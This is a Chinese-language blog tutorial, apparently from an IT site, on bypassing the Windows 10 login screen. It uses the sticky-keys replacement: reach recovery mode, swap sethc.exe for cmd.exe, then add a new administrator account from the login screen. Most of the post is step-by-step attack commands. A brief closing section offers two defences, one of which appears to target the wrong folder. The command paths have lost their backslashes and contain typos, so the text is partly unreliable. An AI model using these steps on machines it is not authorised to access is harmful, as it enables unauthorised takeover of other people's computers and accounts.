利用系统漏洞破解windows10用户与防护

测试系统:windows 10专业1709版本

我们依旧采用的是采用调用粘滞键的方法进行破解,即sethc.exe文件做为跳板对本地用户(对使用微软账号来登陆电脑的账号,无法通过DOS进行密码重置)进行修改或者添加新用户方式,来绕过进入系统。


进入命令提示符模式:

1.首先,通过对处于登陆界面后按下关机键强关机,然后出现windows logo且下方出现滚动的圆圈的时候再强制关机,如此重复3次。来进入wind10 的RE模式,即诊断修复模式;

利用系统漏洞破解windows10用户与防护插图1

2.当出现自动修复提示界面时,选择高级选项;

利用系统漏洞破解windows10用户与防护插图3

3.然依次选择疑难解答->高级选项->命令提示符,然等待;

利用系统漏洞破解windows10用户与防护插图5
利用系统漏洞破解windows10用户与防护插图7
利用系统漏洞破解windows10用户与防护插图9

4.在弹出的管理员cmd对话框,注意此对话框的上方标明了x:windowssystem32cmd.exe;(这里调用的不是电脑本身的系统盘符下的cmd)

利用系统漏洞破解windows10用户与防护插图11


修改sethc.exe文件(即狸猫换太子手法):

  • 在管理员窗口中执行:
diskpart 回车     \磁盘分区管理工具
list volume 回车   \获得计算机中分区列表及每个卷的信息
利用系统漏洞破解windows10用户与防护插图13
  • 确认好系统盘符后,这里确认为C盘,执行:(本人尝试过,没办法直接切换到C盘目录下做后续操作);
exit 回车  \退出磁盘分区管理工具
  • 然后执行以下命令来确认c:windowssystem32目录下是否存在cmd.exe 和sethc.exe两个文件:(记住一定要加上路径);
dir c:windowssysytem32sethc.exe 回车
dir c:windowssysytem32cmd.exe 回车
  • 然后执行以下命令对sethc.exe重命名。我这里改成了sethc11文件(建议把exe后缀给去掉);
ren c:windowssystem32sethc.exe sethc11 回车   \对sethc.exe 文件重命名
利用系统漏洞破解windows10用户与防护插图15
  • 复制cmd.exe文件为cmd11.exe。然后重命名cmd11.exesethc.exe即可;
copy c:windowssystem32cmd.exe c:windowssystem32cmd11.exe 回车  \复制cmd.exe为cmd11.exe
ren c:windowssystem32cmd11.exe sethc.exe 回车  \重命名cmd11.exe为sethc.exe
利用系统漏洞破解windows10用户与防护插图17
  • 关闭管理员窗口,重启windows,正常进入登陆界面;

调用管理员权限cmd对用户进行修改:

  • 在登陆界面,按下5次shift键,然后会弹出管理员权限的CMD窗口;
利用系统漏洞破解windows10用户与防护插图19
  • 然后执行以下命令,新增一个用户并升级为管理员权限;
net user sss /add 回车  \创建一个sss的用户
net localgroup administrators sss /add  \把sss用户升级为管理员权限
利用系统漏洞破解windows10用户与防护插图21
  • 然后你就用可以使用sss用户访问电脑了;
利用系统漏洞破解windows10用户与防护插图23

最后总结下此种方式思路其实也是沿用了windows 7的破解方式,但是在进入诊断修复模式这个地方可能会出现不少问题,比如进不去(注意操作方式正确性)。还有就是在通过命令对setch.exe 和 cmd.exe文件修改地方(一定要注意文件存放的位置,不要搞错了)。


不借外部工具,对window 7用户密码破解与防护https://zhuanlan.zhihu.com/p/33974240


这里也顺便介绍下关于此漏洞防护操作。(不知道后期微软会不会修复此问题)

方案一:

简单粗暴,直接把C:WindowsSysWOW64目录下的sethc文件的执行权限全部取消或让其拒绝访问。

利用系统漏洞破解windows10用户与防护插图25

方案二:

开始-运行里执行gpedit.smc,打开本地组策略编辑器。

依次打开用户配置-管理模板-系统,找到不运行指定的windows应用程序策略,将其激活并把sethc.exe添加进去即可

利用系统漏洞破解windows10用户与防护插图27

如果大家还有其他方式或意见请留言,谢谢;

原创文章 利用系统漏洞破解windows10用户与防护,版权所有
如若转载,请注明出处:https://www.itxiaozhan.cn/20225249.html

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注